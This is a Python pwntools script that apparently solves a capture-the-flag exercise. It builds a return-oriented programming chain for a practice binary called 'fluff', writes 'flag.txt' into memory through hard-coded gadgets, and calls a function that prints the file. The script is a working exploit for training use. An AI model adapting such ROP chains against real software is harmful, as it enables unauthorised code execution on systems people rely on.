
#!/usr/bin/env python3
from pwn import *
# Per-character address table consumed by write_str: each character of the
# string being written maps to one address, which write_str adjusts by 0x3ef2
# before packing it into the chain. The values are specific to one build of
# the target binary and are not valid for any other build.
letter_lookups = dict([
    ('f', 0x4003c4),
    ('l', 0x400239),
    ('a', 0x4003d6),
    ('g', 0x4003cf),
    ('.', 0x400251),
    ('t', 0x400192),
    ('x', 0x400246),
])
def write_str(dest, string, payload):
    """Extend *payload* with a chain that writes *string* at address *dest*.

    The chain starts with the 0x4006a3 address followed by *dest*, then repeats
    one fixed seven-entry sequence per character; the only per-character
    value is the character's ``letter_lookups`` entry minus 0x3ef2. Every
    address here is hard-coded for a single build of the target binary.

    Args:
        dest: address the string is written to.
        string: characters to write; each must be a key of ``letter_lookups``.
        payload: bytes built so far (not mutated).

    Returns:
        A new ``bytes`` object: *payload* followed by the generated chain.

    Raises:
        KeyError: if a character of *string* is not in ``letter_lookups``.
    """
    chunks = [payload, p64(0x00000000004006a3), p64(dest)]
    for ch in string:
        # The original author noted that the 0x4000 entry is the first thing
        # to re-check (endianness / ordering) if the write misbehaves.
        chunks.extend([
            p64(0x40062a),
            p64(0x4000),
            p64(letter_lookups[ch] - 0x3ef2),
            p64(0x0000000000400610),
            p64(0),
            p64(0x400628),
            p64(0x400639),
        ])
    return b''.join(chunks)
# Launch the target under gdb with a breakpoint at pwnme+151 (same script
# text as the original triple-quoted literal).
prog = gdb.debug('./fluff', gdbscript='\nbreak *pwnme + 151\n')

# 40 filler bytes precede the chain; the offset is fixed for this binary build.
padding = b'a' * 40

# Destination of the "flag.txt" string. The original passed this sum to
# write_str and then wrote the same value as the literal 0x601be0 below.
str_addr = 0x0000000000600df0 + 0x00000df0  # == 0x601be0

payload = write_str(str_addr, 'flag.txt', padding)
# Original comment on the second value here reads "set rdi"; presumably the
# 0x4006a3 address is what loads it, but that is not verifiable from this file.
payload += p64(0x00000000004006a3) + p64(str_addr)
payload += p64(0x0000000000400510)
# sendline() appends its own newline, so the input ends with two.
payload += b"\n"

prog.sendline(payload)
sleep(1)
print(prog.recv().decode('UTF-8'))
prog.interactive()